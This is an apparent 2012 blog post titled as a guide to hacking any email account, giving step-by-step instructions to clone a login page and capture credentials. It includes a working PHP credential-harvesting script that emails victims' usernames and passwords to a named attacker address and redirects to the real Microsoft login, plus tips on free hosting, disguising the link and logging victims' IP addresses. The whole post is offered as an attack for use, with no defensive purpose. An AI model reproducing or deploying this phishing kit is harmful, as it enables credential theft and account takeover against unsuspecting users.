SEARCH

x

Monday 18 June 2012

How to Make a Phisher to Hack Any E-Mail Account Password



Making a phisher is very simple. You don’t have to know anything about coding. Just follow me as mentioned in below steps:

1. First of all go to the website you want to copy, and locate the login page.

2. Right click, and click on Source. Highlight all and copy onto a text document.

3. Go into the source and search for <form (Ctrl + F and search the code), when you find it look along the tag and find action=" and inside it there will be a URL, delete that url and type in login.php

4. Now you need to find where the textboxes are. To do this find a label next to one of the inputs, eg 'E-mail address:' Then go into the source and search for 'E-mail address:' then follow it along until you see <input name= "login"

5. Now open up notepad and post the following code, and then follow instuctions after the //

//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: https://login.live.com/ppsecure/post.srf?id=66262');
?>

6. Save it as login.php

7. Upload both files onto your website or to a free-hosting site like:

www.yourfreehosting.net
www.drivehq.com
www.110mb.com
www.t35.com
www.esmartstart.com
Good trick to make link longer is to put '?' after any page and put anything after it.

You can get someones ip address by if you put at the top of the login.php file this code:

$ip_address = $_SERVER['REMOTE_ADDR']

No comments:

Post a Comment